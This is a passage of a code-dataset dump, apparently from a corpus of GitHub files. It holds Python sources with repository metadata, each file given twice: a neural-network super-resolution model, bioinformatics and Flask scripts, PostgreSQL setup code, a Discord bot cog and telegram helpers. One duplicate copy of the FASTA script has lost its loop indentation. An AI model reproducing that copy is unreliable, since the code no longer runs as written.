        # self.mean = torch.Tensor(rgb_mean).view(1, 3, 1, 1)
        self.conv_first = nn.Conv2d(num_in_ch * num_frames, num_feat, 3, 1, 1)
        self.body = make_layer(
            ResidualGroup,
            num_group,
            num_feat=num_feat,
            num_block=num_block,
            squeeze_factor=squeeze_factor,
            res_scale=res_scale)
        self.conv_after_body = nn.Conv2d(num_feat, num_feat, 3, 1, 1)
        self.upsample = Upsample(upscale, num_feat)
        self.conv_last = nn.Conv2d(num_feat, num_out_ch, 3, 1, 1)
    def forward(self, x):
        # self.mean = self.mean.type_as(x)
        # x = (x - self.mean) * self.img_range
        # Fold a (B, N, C, H, W) frame stack into (B, N*C, H, W) channels.
        if x.dim() == 5:
            B, N, C, H, W = x.shape
            x = x.view(B, N*C, H, W)
        x = self.conv_first(x)
        res = self.conv_after_body(self.body(x))
        # Long skip connection around the whole residual body.
        res += x
        x = self.conv_last(self.upsample(res))
        # x = x / self.img_range + self.mean
        return x
if __name__ == '__main__':
    # Smoke test: batch of 4 samples, 3 frames x 3 channels at 64x64;
    # upscale=1 keeps the spatial size, so out.shape == (4, 3, 64, 64).
    x = torch.randn(4, 3, 3, 64, 64)
    model = RCAN(num_in_ch=3,
                 num_out_ch=3,
                 num_frames=3,
                 num_feat=64,
                 num_group=5,
                 num_block=2,
                 squeeze_factor=16,
                 upscale=1,
                 res_scale=1)
    out = model(x)
    print(out.shape)
| 3,167 | 0 | 243 |
c2181aeb8e9a201390010d5f8b9cbabbb2dca0d3 | 709 | py | Python | fasta_manipulation/fasta_to_genbank.py | olgatsiouri1996/biomisc | b4fdaf3dd49816b7ca9da1d200ab4443455ab784 | [
"MIT"
] | 2 | 2020-06-18T23:43:15.000Z | 2020-10-02T12:32:21.000Z | fasta_manipulation/fasta_to_genbank.py | olgatsiouri1996/biomisc | b4fdaf3dd49816b7ca9da1d200ab4443455ab784 | [
"MIT"
] | 1 | 2021-04-18T00:15:24.000Z | 2021-08-01T20:46:02.000Z | fasta_manipulation/fasta_to_genbank.py | olgatsiouri1996/biomisc | b4fdaf3dd49816b7ca9da1d200ab4443455ab784 | [
"MIT"
] | null | null | null | # python3
import argparse
from Bio import SeqIO
from Bio.Alphabet import generic_dna, generic_protein
# input parameters
ap = argparse.ArgumentParser()
ap.add_argument("-fa","--fasta", required=True, help="input fasta file")
ap.add_argument("-gb", "--genbank", required=True, help="output genbank file")
args = vars(ap.parse_args())
# main
# NOTE(review): mode "rU" is deprecated (removed in Python 3.11); plain "r"
# behaves the same under Python 3.
input_handle = open(args['fasta'], "rU")
output_handle = open(args['genbank'], "w")
# import fasta
sequences = list(SeqIO.parse(input_handle, "fasta"))
# assign a DNA alphabet to every record -- presumably required by the
# GenBank writer below; verify against the Biopython version in use
for seq in sequences:
    seq.seq.alphabet = generic_dna
# output
count = SeqIO.write(sequences, output_handle, "genbank")
output_handle.close()
input_handle.close()
| 27.269231 | 78 | 0.737659 | # python3
import argparse
from Bio import SeqIO
from Bio.Alphabet import generic_dna, generic_protein
# imput parameters
ap = argparse.ArgumentParser()
ap.add_argument("-fa","--fasta", required=True, help="input fasta file")
ap.add_argument("-gb", "--genbank", required=True, help="output genbank file")
args = vars(ap.parse_args())
# main
input_handle = open(args['fasta'], "rU")
output_handle = open(args['genbank'], "w")
# import fasta
sequences = list(SeqIO.parse(input_handle, "fasta"))
# asign generic_dna or generic_protein
for seq in sequences:
seq.seq.alphabet = generic_dna
# output
count = SeqIO.write(sequences, output_handle, "genbank")
output_handle.close()
input_handle.close()
| 0 | 0 | 0 |
3f2a837c7448ee33c18e813bdaf73a07903d0fe7 | 643 | py | Python | backend/blog.py | bbruceyuan/easy-blog | 742bd8d0c8f3d8af793c4e8f531daad410a46151 | [
"MIT"
] | 1 | 2018-08-01T10:51:54.000Z | 2018-08-01T10:51:54.000Z | backend/blog.py | hey-bruce/easy_blog | 742bd8d0c8f3d8af793c4e8f531daad410a46151 | [
"MIT"
] | 1 | 2019-07-20T07:14:25.000Z | 2019-07-20T07:14:25.000Z | backend/blog.py | bbruceyuan/easy-blog | 742bd8d0c8f3d8af793c4e8f531daad410a46151 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Created by BBruceyuan on 18-7-9.
from flask_script import Manager
from flask_script import Shell
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from app import create_app
from app import db
blog = create_app('develop')
manager = Manager(blog)
# with blog.app_context():
# print(current_app.config['SECRET_KEY'])
# manager.run()
migrate = Migrate(blog, db)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
| 20.09375 | 68 | 0.755832 | #!/usr/bin/env python
# Created by BBruceyuan on 18-7-9.
from flask_script import Manager
from flask_script import Shell
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from app import create_app
from app import db
# Application bootstrap: create the Flask app with the "develop" config and
# attach the Flask-Script command-line manager.
blog = create_app('develop')
manager = Manager(blog)
# with blog.app_context():
# print(current_app.config['SECRET_KEY'])
# manager.run()
# Flask-Migrate binding so the `db` command registered below can run
# migrations against this app/database pair.
migrate = Migrate(blog, db)
def make_shell_context():
    """Names preloaded into the `shell` command's interactive namespace."""
    return {"app": blog, "db": db}
# CLI wiring: `shell` opens a REPL preloaded with app/db, `db` exposes the
# Flask-Migrate (Alembic) commands.
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
    manager.run()
| 37 | 0 | 23 |
04bd0d40cfcfb96beef4e0573e3a0ec93949247b | 9,410 | py | Python | utils/network.py | dunknowcoding/DilatedCRF | 416ca017d280632353824902df2ea7c035acf1c5 | [
"Apache-2.0"
] | 1 | 2022-02-01T00:42:19.000Z | 2022-02-01T00:42:19.000Z | utils/network.py | dunknowcoding/DilatedCRF | 416ca017d280632353824902df2ea7c035acf1c5 | [
"Apache-2.0"
] | null | null | null | utils/network.py | dunknowcoding/DilatedCRF | 416ca017d280632353824902df2ea7c035acf1c5 | [
"Apache-2.0"
] | 1 | 2022-02-11T09:31:13.000Z | 2022-02-11T09:31:13.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
: Project - Dialted CRF
: Network frameworks and helpers
: Author - Xi Mo
: Institute - University of Kansas
: Date - 6/24/2021
: Last Update - 7/10/2021
: License: Apache 2.0
"""
import torch
import torch.nn as nn
import torch.nn.functional as ops
import time
import math
from pathlib import Path
from utils.configuration import CONFIG
# optimizer parser
# Write model to disk
| 44.386792 | 90 | 0.453454 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
: Project - Dialted CRF
: Network frameworks and helpers
: Author - Xi Mo
: Institute - University of Kansas
: Date - 6/24/2021
: Last Update - 7/10/2021
: License: Apache 2.0
"""
import torch
import torch.nn as nn
import torch.nn.functional as ops
import time
import math
from pathlib import Path
from utils.configuration import CONFIG
class DSConv(nn.Module):
    """Helper branch used by Aggregate: a (depth, 1) conv stack plus global
    average/max pooling statistics of its input.

    NOTE(review): `convFeat` is computed but never used -- both pools run on
    the raw input `feat`, so `self.dsconv` currently has no effect on the
    output; confirm whether the pools were meant to consume `convFeat`.
    """
    def __init__(self, depth=CONFIG["NUM_CLS"], stride=1):
        super(DSConv, self).__init__()
        # (depth, 1) kernel -- presumably collapses the class axis of a
        # (B, 1, depth, L) map; TODO confirm against Aggregate's input layout.
        self.dsconv = nn.Sequential(
            nn.Conv2d(1, 1, (depth, 1), stride = stride),
            nn.BatchNorm2d(1, affine = True),
            nn.ReLU6(inplace = True)
        )
    def forward(self, feat):
        convFeat = self.dsconv(feat)
        # Global statistics: adaptive_*_pool3d to (1, 1, 1) reduces each
        # sample to a single scalar per stream.
        avgFeat = ops.adaptive_avg_pool3d(feat, (1, 1, 1))
        maxFeat = ops.adaptive_max_pool3d(feat, (1, 1, 1))
        return avgFeat, maxFeat
class Aggregate(nn.Module):
    """Runs `d` DSConv branches over the input and projects their pooled
    scalars back to an H*W-length vector, separately for the average- and
    max-pool streams.  `d` scales with sqrt(H*W) of the downscaled
    CONFIG["SIZE"] map.
    """
    def __init__(self, inChan = CONFIG["NUM_CLS"], scale = 0.25):
        super(Aggregate, self).__init__()
        self.DSCModules = nn.ModuleList([])
        H, W = CONFIG["SIZE"]
        H, W = int(H * scale), int(W * scale)
        d = int(math.sqrt(H * W)/2) # for full-size, use d = int(math.sqrt(H * W) / 10)
        # d = int(math.sqrt(H * W) / 10)
        # upsampling for average global pooling
        self.upSampleAvg = nn.Sequential(
            nn.Linear(d, H * W, bias = True),
            nn.LayerNorm(H * W,),
            nn.ReLU6(inplace = True)
        )
        # upsampling for max global pooling
        self.upSampleMax = nn.Sequential(
            nn.Linear(d, H * W, bias = True),
            nn.LayerNorm(H * W),
            nn.ReLU6(inplace = True)
        )
        for _ in range(d):
            self.DSCModules.append(DSConv(inChan))
    def forward(self, feat):
        # Each DSConv yields one (avg, max) scalar pair; concatenating along
        # dim 3 forms two d-length vectors, which the Linear layers expand
        # back to H*W features.
        for sk, module in enumerate(self.DSCModules):
            if sk == 0:
                avgFeat, maxFeat = module(feat)
            else:
                tmpAvgFeat, tmpMaxFeat = module(feat)
                avgFeat = torch.cat((avgFeat, tmpAvgFeat), 3)
                maxFeat = torch.cat((maxFeat, tmpMaxFeat), 3)
        avgFeat = self.upSampleAvg(avgFeat)
        maxFeat = self.upSampleMax(maxFeat)
        return avgFeat, maxFeat
class global_energy(nn.Module):
    """Global-context ("energy") term: reshape the score map to a
    (B, 1, C, H*W) layout, gather pooled statistics via Aggregate, and fuse
    the avg/max maps with the original features through a 1x1 conv.
    """
    def __init__(self, inChan = CONFIG["NUM_CLS"], scale = 0.125):
        super(global_energy, self).__init__()
        self.inChan = inChan
        self.scale = scale
        H, W = CONFIG["SIZE"]
        self.H, self.W = int(H * scale), int(W * scale)
        self.globalFeats = Aggregate(inChan, self.scale)
        # 1x1 fusion conv: 2 pooled maps + NUM_CLS feature channels in,
        # NUM_CLS channels out.
        self.conv = nn.Sequential(
            nn.Conv2d(2 + CONFIG["NUM_CLS"], CONFIG["NUM_CLS"], 1, bias = True),
            nn.BatchNorm2d(CONFIG["NUM_CLS"], affine = True),
            nn.ReLU6(inplace = True)
        )
    def forward(self, feat):
        # (B, C, H, W) -> (B, C, 1, H*W) -> (B, 1, C, H*W) for Aggregate.
        transFeat = feat.view(feat.shape[0], feat.shape[1], 1, -1)
        transFeat = torch.transpose(transFeat, 1, 2)
        avgFeat, maxFeat = self.globalFeats(transFeat)
        # Fold the H*W vectors back into single-channel spatial maps.
        avgFeat = avgFeat.view(avgFeat.shape[0], 1, self.H, self.W)
        maxFeat = maxFeat.view(maxFeat.shape[0], 1, self.H, self.W)
        Feat = self.conv(torch.cat((avgFeat, maxFeat, feat), 1))
        return Feat
class dialated_crf(nn.Module):
def __init__(self, inChan = CONFIG["NUM_CLS"], scale = 0.125):
super(dialated_crf, self).__init__()
self.scale = scale
if scale != 1:
self.downSample = nn.FractionalMaxPool2d(3, output_ratio = scale)
self.getGlobalEnergy = global_energy(inChan = inChan, scale = scale)
self.getUnary = nn.Sequential(
nn.Conv2d(CONFIG["NUM_CLS"], CONFIG["NUM_CLS"], 1, bias = False),
nn.BatchNorm2d(CONFIG["NUM_CLS"]),
nn.ReLU6(inplace = True)
)
self.normlizer = nn.Sequential(
nn.Conv2d(2 * inChan, inChan, 1, 1, bias=False),
nn.BatchNorm2d(inChan)
)
def forward(self, feat):
if self.scale != 1: feat = self.downSample(feat)
unary = self.getUnary(feat)
out = self.getGlobalEnergy(feat)
out = torch.cat((out, unary), dim = 1)
out = self.normlizer(out)
if self.scale != 1: out = ops.interpolate(out, scale_factor=int(1 / self.scale))
return out
# optimizer parser
def optimizer(_net):
if CONFIG["OPTIM"] == "adamw":
optimizer = torch.optim.AdamW(_net.parameters(),
lr = CONFIG["LR"],
betas = CONFIG["BETAS"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"],
amsgrad = CONFIG["AMSGRAD"])
elif CONFIG["OPTIM"] == "adam":
optimizer = torch.optim.Adam(_net.parameters(),
lr = CONFIG["LR"],
betas = CONFIG["BETAS"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"],
amsgrad = CONFIG["AMSGRAD"])
elif CONFIG["OPTIM"] == "sgd":
optimizer = torch.optim.SGD(_net.parameters(),
lr = CONFIG["LR"],
momentum = CONFIG["MOMENT"],
weight_decay = CONFIG["DECAY"],
dampening = CONFIG["DAMPEN"],
nesterov = CONFIG["NESTROV"])
elif CONFIG["OPTIM"] == "rmsprop":
optimizer = torch.optim.RMSprop(_net.parameters(),
lr = CONFIG["LR"],
momentum = CONFIG["MOMENT"],
weight_decay = CONFIG["DECAY"],
alpha = CONFIG["ALPHA"],
eps = CONFIG["EPS"],
centered = CONFIG["CENTERED"])
elif CONFIG["OPTIM"] == "rprop":
optimizer = torch.optim.Rprop(_net.parameters(),
lr = CONFIG["LR"],
etas = CONFIG["ETAS"],
step_sizes = CONFIG["STEPSIZE"])
elif CONFIG["OPTIM"] == "adagrad":
optimizer = torch.optim.Adagrad(_net.parameters(),
lr = CONFIG["LR"],
lr_decay = CONFIG["LR_DECAY"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"])
elif CONFIG["OPTIM"] == "adadelta":
optimizer = torch.optim.Adadelta(_net.parameters(),
lr = CONFIG["LR"],
rho = CONFIG["RHO"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"])
elif CONFIG["OPTIM"] == "sparseadam":
optimizer = torch.optim.SparseAdam(_net.parameters(),
lr = CONFIG["LR"],
betas = CONFIG["BETAS"],
eps = CONFIG["EPS"])
elif CONFIG["OPTIM"] == "adamax":
optimizer = torch.optim.Adamax(_net.parameters(),
lr = CONFIG["LR"],
betas = CONFIG["BETAS"],
weight_decay = CONFIG["DECAY"],
eps = CONFIG["EPS"])
elif CONFIG["OPTIM"] == "asgd":
optimizer = torch.optim.ASGD(_net.parameters(),
lr = CONFIG["LR"],
lambd = CONFIG["LAMBD"],
alpha = CONFIG["ALPHA"],
weight_decay = CONFIG["DECAY"],
t0 = CONFIG["T0"])
else:
raise NameError(f"Unsupported optimizer {CONFIG['OPTIM']}, please customize it.")
return optimizer
# Write model to disk
def save_model(baseDir: Path, network: torch.nn.Module, epoch: int, logger: {},
optimizer: torch.optim, postfix="dcrf"):
date = time.strftime(f"%Y%m%d-%H%M%S-Epoch-{epoch}_{postfix}.pt", time.localtime())
path = baseDir.joinpath(date)
print("\nNow saveing model to:\n%s" %path)
torch.save({
'epoch': epoch,
'logs': logger,
'model_state_dict': network.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
}, path)
print("Done!\n") | 8,548 | 28 | 369 |
3ca35272338005ea0002852caf9dcad2fb40a023 | 6,977 | py | Python | backend/galvanalyser/database/__init__.py | Battery-Intelligence-Lab/galvanalyser | 3b7198df1caf015fcb802ba94df999aa36c08f4f | [
"BSD-2-Clause"
] | 13 | 2021-11-11T10:59:12.000Z | 2022-02-02T18:27:48.000Z | backend/galvanalyser/database/__init__.py | Battery-Intelligence-Lab/galvanalyser | 3b7198df1caf015fcb802ba94df999aa36c08f4f | [
"BSD-2-Clause"
] | 19 | 2021-11-11T14:20:53.000Z | 2022-02-16T09:49:27.000Z | backend/galvanalyser/database/__init__.py | Battery-Intelligence-Lab/galvanalyser | 3b7198df1caf015fcb802ba94df999aa36c08f4f | [
"BSD-2-Clause"
] | 1 | 2022-01-14T08:10:08.000Z | 2022-01-14T08:10:08.000Z | import psycopg2
from psycopg2 import sql
import string
import os
from .row import Row
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
Base = declarative_base()
from .harvester import (
HarvesterRow,
MonitoredPathRow,
)
| 27.908 | 84 | 0.570446 | import psycopg2
from psycopg2 import sql
import string
import os
from .row import Row
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
Base = declarative_base()
from .harvester import (
HarvesterRow,
MonitoredPathRow,
)
def create_harvester_user(config, harvester, password, test=False):
conn = _create_superuser_connection(config)
if test:
role = 'test_harvester'
else:
role = 'harvester'
# create harvester user
_create_user(conn, harvester, password, role)
conn.close()
def create_machine_id(config, machine_id, harvester_name):
conn = _create_superuser_connection(config)
# if machine_id does not already exist then create it
harvester = HarvesterRow.select_from_machine_id(machine_id, conn)
if harvester is None:
HarvesterRow(machine_id, harvester_name).insert(conn)
conn.commit()
conn.close()
def add_machine_path(config, machine_id, path, users):
conn = _create_superuser_connection(config)
harvester = HarvesterRow.select_from_machine_id(machine_id, conn)
if harvester is None:
raise RuntimeError(
'machine_id "{}" does not exist'.format(machine_id)
)
MonitoredPathRow(
harvester.id,
users,
path
).insert(conn)
conn.commit()
conn.close()
def edit_machine_path(config, machine_id):
conn = _create_superuser_connection(config)
harvester = HarvesterRow.select_from_machine_id(machine_id, conn)
if harvester is None:
raise RuntimeError(
'machine_id "{}" does not exist'.format(machine_id)
)
paths = MonitoredPathRow.select_from_harvester_id(harvester.id, conn)
print('Monitored paths for machine "{}" are:'.format(machine_id))
for i, path in enumerate(paths):
print(' {}. {}'.format(i, path.path.replace('/usr/data/', '')))
while True:
index = input('Type the path number you wish to edit: ')
try:
index = int(index)
break
except ValueError:
print(
'Error: {} could not be converted to an integer'.format(index)
)
monitored_for = paths[index].monitored_for
paths[index].delete(conn)
conn.commit()
while True:
path = input(
'Type the new path (an empty path removes this monitored path): '
)
if os.path.isabs(path):
print(
'Please enter a relative path '
'to GALVANALYSER_HARVESTER_BASE_PATH'
)
elif path == '':
return
else:
path = '/usr/data/' + path
break
MonitoredPathRow(
harvester.id,
monitored_for,
path
).insert(conn)
conn.commit()
conn.close()
def create_database(config, test=False):
print('Creating database....')
_create(config)
print('Applying initial migrations....')
_setup(config, test)
print('Finished creating database.')
def _create_user(conn, username, password, role='normal_user'):
with conn.cursor() as cur:
# drop user if they exist
user_ident = sql.Identifier(username)
cur.execute(
sql.SQL("DROP USER IF EXISTS {user}").format(user=user_ident)
)
# create user
user_type = sql.Identifier(role)
cur.execute(sql.SQL(
"""
CREATE USER {user} WITH
LOGIN
NOSUPERUSER
INHERIT
NOCREATEDB
NOCREATEROLE
NOREPLICATION
PASSWORD %(passwd)s;
GRANT {type} TO {user};
"""
).format(user=user_ident, type=user_type),
{'passwd': password})
conn.commit()
def _database_exists(cur, name):
cur.execute("SELECT datname FROM pg_database;")
return (name,) in cur.fetchall()
def _create_superuser_connection(config):
return psycopg2.connect(
host=config["GALVANISER_DATABASE"]["HOST"],
port=config["GALVANISER_DATABASE"]["PORT"],
database=config["GALVANISER_DATABASE"]["NAME"],
user=config["GALVANISER_DATABASE"]["USER"],
password=config["GALVANISER_DATABASE"]["PASSWORD"],
)
def _create(config):
conn = psycopg2.connect(
host=config["GALVANISER_DATABASE"]["HOST"],
port=config["GALVANISER_DATABASE"]["PORT"],
database="postgres",
user=config["GALVANISER_DATABASE"]["USER"],
password=config["GALVANISER_DATABASE"]["PASSWORD"],
)
conn.autocommit = True
db_name = config["GALVANISER_DATABASE"]["NAME"]
with conn.cursor() as cur:
if _database_exists(cur, db_name):
print(
'in create():"{}" database already exists, dropping'.format(db_name)
)
cur.execute(
sql.SQL(
"DROP DATABASE {db_name};"
).format(db_name=sql.Identifier(db_name)))
cur.execute(sql.SQL("""
CREATE DATABASE {db_name}
WITH
OWNER = postgres
ENCODING = 'UTF8'
LC_COLLATE = 'en_US.utf8'
LC_CTYPE = 'en_US.utf8'
TABLESPACE = pg_default
CONNECTION LIMIT = -1;
""").format(db_name=sql.Identifier(db_name)))
conn.close()
def _setup(config, test=False):
conn = _create_superuser_connection(config)
if test:
harvester_role = 'test_harvester'
else:
harvester_role = 'harvester'
print('using roles', harvester_role)
with conn.cursor() as cur:
# create roles if they dont exist
cur.execute("SELECT rolname FROM pg_roles;")
roles = cur.fetchall()
for role in [harvester_role]:
if (role,) not in roles:
cur.execute(sql.SQL("""
CREATE ROLE {role} WITH
NOLOGIN
NOSUPERUSER
INHERIT
NOCREATEDB
NOCREATEROLE
NOREPLICATION;
""").format(role=sql.Identifier(role)))
conn.commit()
# set timezone
cur.execute(
sql.SQL(
"ALTER DATABASE {db_name} SET timezone TO 'UTC';"
).format(
db_name=sql.Identifier(
config["GALVANISER_DATABASE"]["NAME"]
)
)
)
cur.execute("SELECT pg_reload_conf();")
# create initial database
filename = os.path.join(
os.path.dirname(__file__),
"setup.pgsql"
)
cur.execute(
string.Template(
open(filename, "r").read()
).substitute(
harvester_role=harvester_role,
)
)
conn.commit()
conn.close()
| 6,464 | 0 | 230 |
49b8740c785069cbca81ccdfb08e1ce33f77fee8 | 1,113 | py | Python | aztk/client/client.py | Geims83/aztk | 8f8e7b268bdbf82c3ae4ecdcd907077bd6fe69b6 | [
"MIT"
] | 161 | 2017-10-04T08:58:27.000Z | 2022-01-03T13:01:04.000Z | aztk/client/client.py | Geims83/aztk | 8f8e7b268bdbf82c3ae4ecdcd907077bd6fe69b6 | [
"MIT"
] | 400 | 2017-09-29T21:52:08.000Z | 2021-01-08T02:48:56.000Z | aztk/client/client.py | isabella232/aztk | 6e04372d19661ead6744387edab7beda16e3d928 | [
"MIT"
] | 74 | 2017-10-13T04:41:26.000Z | 2021-12-20T15:56:42.000Z | from aztk import models
from aztk.utils import azure_api
class CoreClient:
"""The base AZTK client that all other clients inherit from.
**This client should not be used directly. Only software specific clients
should be used.**
"""
| 33.727273 | 80 | 0.703504 | from aztk import models
from aztk.utils import azure_api
class CoreClient:
"""The base AZTK client that all other clients inherit from.
**This client should not be used directly. Only software specific clients
should be used.**
"""
def __init__(self):
self.secrets_configuration = None
self.batch_client = None
self.blob_client = None
self.table_service = None
def _get_context(self, secrets_configuration: models.SecretsConfiguration):
self.secrets_configuration = secrets_configuration
azure_api.validate_secrets(secrets_configuration)
self.batch_client = azure_api.make_batch_client(secrets_configuration)
self.blob_client = azure_api.make_blob_client(secrets_configuration)
self.table_service = azure_api.make_table_service(secrets_configuration)
context = {
"batch_client": self.batch_client,
"blob_client": self.blob_client,
"table_service": self.table_service,
"secrets_configuration": self.secrets_configuration,
}
return context
| 807 | 0 | 54 |
446d3c502edcc9e6f84b8f10397077cf54871c59 | 3,022 | py | Python | cogs/events/voice.py | disneyresidents/2rezi-bot | c7fbc46a0b6852d5795f3350baeac89fc1e5d519 | [
"MIT"
] | 9 | 2020-08-02T03:50:01.000Z | 2022-01-06T05:25:47.000Z | cogs/events/voice.py | disneyresidents/bot-cog | c7fbc46a0b6852d5795f3350baeac89fc1e5d519 | [
"MIT"
] | null | null | null | cogs/events/voice.py | disneyresidents/bot-cog | c7fbc46a0b6852d5795f3350baeac89fc1e5d519 | [
"MIT"
] | 3 | 2020-08-10T05:08:50.000Z | 2020-12-05T10:00:29.000Z | import asyncio
import re
import discord
from discord.ext import commands
| 38.253165 | 90 | 0.609199 | import asyncio
import re
import discord
from discord.ext import commands
class Voice(commands.Cog, name="voice"):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_voice_state_update(self, member, before, after):
if member.guild.id == 662503350633365515:
if member.bot:
return
ch_dic = {
669850293407842305: 669850327599546389,
669850376341815347: 669850400039370762
}
if before.channel is None:
if after.channel.id not in ch_dic.keys():
return
ch = self.bot.get_channel(ch_dic[after.channel.id])
await ch.send(f"{member}が{after.channel}に参加しました")
if after.channel is None:
if before.channel.id not in ch_dic.keys():
return
ch = self.bot.get_channel(ch_dic[before.channel.id])
await ch.send(f"{member}が{before.channel}から離脱しました")
@commands.has_permissions(manage_guild=True)
@commands.group(invoke_without_command=True, hidden=True)
async def voice(self, ctx):
await ctx.send(f"{ctx.prefix}voice [set_log, rem_log]")
@commands.has_permissions(manage_guild=True)
@voice.command(hidden=True)
async def set_log(self, ctx, ch_id: int = None):
if ctx.author.voice.channel is None or ch_id is None:
def check(m):
return m.author == ctx.author and m.channel == ctx.channel
await ctx.send("監視するボイスチャンネルのidまたは名前を送信してください")
try:
msg = await self.bot.wait_for("message", check=check, timeout=300)
except asyncio.TimeoutError:
return await ctx.send("タイムアウトしました。最初からやり直してください")
p = re.compile(r"[0-9]+")
if p.fullmatch(msg.content):
ch = self.bot.get_channel(int(msg.content))
else:
ch = discord.utils.get(ctx.guild.voice_channels, name=msg.content)
if ch is None:
return await ctx.send("チャンネルを見つけられませんでした、名前、idが間違っていないか確かめてください")
if not isinstance(ch, discord.VoiceChannel):
return await ctx.send("指定されたチャンネルはボイスチャンネルではありません。名前、idが間違っていないか確かめてください")
await self.bot.voice_log.put(ch.id, ctx.channel.id)
await ctx.send(f"{ctx.channel}を{ch}のログチャンネルとして設定しました")
elif ctx.author.voice.channel:
await self.bot.voice_log.put(ctx.author.voice.channel.id, ctx.channel.id)
await ctx.send(f"{ctx.channel}を{ctx.author.voice.channel}のログチャンネルとして設定しました")
elif ch_id:
ch = self.bot.get_channel(ch_id)
if ch is None:
return await ctx.send("チャンネルを見つけられませんでした、名前、idが間違っていないか確かめてください")
if not isinstance(ch, discord.VoiceChannel):
return await ctx.send("指定されたチャンネルはボイスチャンネルではありません。名前、idが間違っていないか確かめてください")
def setup(bot):
bot.add_cog(Voice(bot))
| 3,101 | 347 | 46 |
6ac42f1ec378a9bba90c87d80cc37c6563ac1bc5 | 1,136 | py | Python | app/api/lists.py | palazzem/gello | 19fe9e4aa8de485dd829a87047ec64f89b5fa7ee | [
"Apache-2.0"
] | 44 | 2018-03-28T14:22:23.000Z | 2022-03-15T07:25:06.000Z | app/api/lists.py | palazzem/gello | 19fe9e4aa8de485dd829a87047ec64f89b5fa7ee | [
"Apache-2.0"
] | 44 | 2018-03-28T14:19:03.000Z | 2022-02-16T10:24:57.000Z | app/api/lists.py | palazzem/gello | 19fe9e4aa8de485dd829a87047ec64f89b5fa7ee | [
"Apache-2.0"
] | 12 | 2018-03-28T14:15:43.000Z | 2021-07-19T17:33:20.000Z | # -*- coding: utf-8 -*-
#
# Unless explicitly stated otherwise all files in this repository are licensed
# under the Apache 2 License.
#
# This product includes software developed at Datadog
# (https://www.datadoghq.com/).
#
# Copyright 2018 Datadog, Inc.
#
"""api/lists.py
Exposed lists for autocomplete.
"""
from flask import jsonify, request, url_for
from flask_login import login_required
from ..models import List
from . import api
@api.route('/lists/<string:board_id>')
@login_required
| 23.183673 | 78 | 0.65493 | # -*- coding: utf-8 -*-
#
# Unless explicitly stated otherwise all files in this repository are licensed
# under the Apache 2 License.
#
# This product includes software developed at Datadog
# (https://www.datadoghq.com/).
#
# Copyright 2018 Datadog, Inc.
#
"""api/lists.py
Exposed lists for autocomplete.
"""
from flask import jsonify, request, url_for
from flask_login import login_required
from ..models import List
from . import api
@api.route('/lists/<string:board_id>')
@login_required
def get_lists(board_id):
list = request.args.get('list', 1, type=int)
pagination = List.query.filter_by(board_id=board_id).paginate(
list, per_page=100, error_out=False)
lists = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_lists', list=list-1, _external=True)
next = None
if pagination.has_next:
next = url_for('api.get_lists', list=list+1, _external=True)
return jsonify(
{
'lists': [list.to_json() for list in lists],
'prev': prev,
'next': next,
'count': pagination.total
}
)
| 616 | 0 | 22 |
9d6ed3a4d70d04463333dc2bacd3f64ffaa9050e | 1,181 | py | Python | src/lib/telegram/utils/helpers.py | thonkify/thonkify | 2cb4493d796746cb46c8519a100ef3ef128a761a | [
"MIT"
] | 17 | 2017-08-04T15:41:05.000Z | 2020-10-16T18:02:41.000Z | src/lib/telegram/utils/helpers.py | thonkify/thonkify | 2cb4493d796746cb46c8519a100ef3ef128a761a | [
"MIT"
] | 3 | 2017-08-04T23:37:37.000Z | 2017-08-04T23:38:34.000Z | src/lib/telegram/utils/helpers.py | thonkify/thonkify | 2cb4493d796746cb46c8519a100ef3ef128a761a | [
"MIT"
] | 3 | 2017-12-07T16:30:59.000Z | 2019-06-16T02:48:28.000Z | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
""" This module contains helper functions """
import re
try:
from html import escape as escape_html # noqa: F401
except ImportError:
from cgi import escape as escape_html # noqa: F401
def escape_markdown(text):
"""Helper function to escape telegram markup symbols"""
escape_chars = '\*_`\['
return re.sub(r'([%s])' % escape_chars, r'\\\1', text)
| 35.787879 | 71 | 0.733277 | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
""" This module contains helper functions """
import re
try:
from html import escape as escape_html # noqa: F401
except ImportError:
from cgi import escape as escape_html # noqa: F401
def escape_markdown(text):
"""Helper function to escape telegram markup symbols"""
escape_chars = '\*_`\['
return re.sub(r'([%s])' % escape_chars, r'\\\1', text)
| 0 | 0 | 0 |
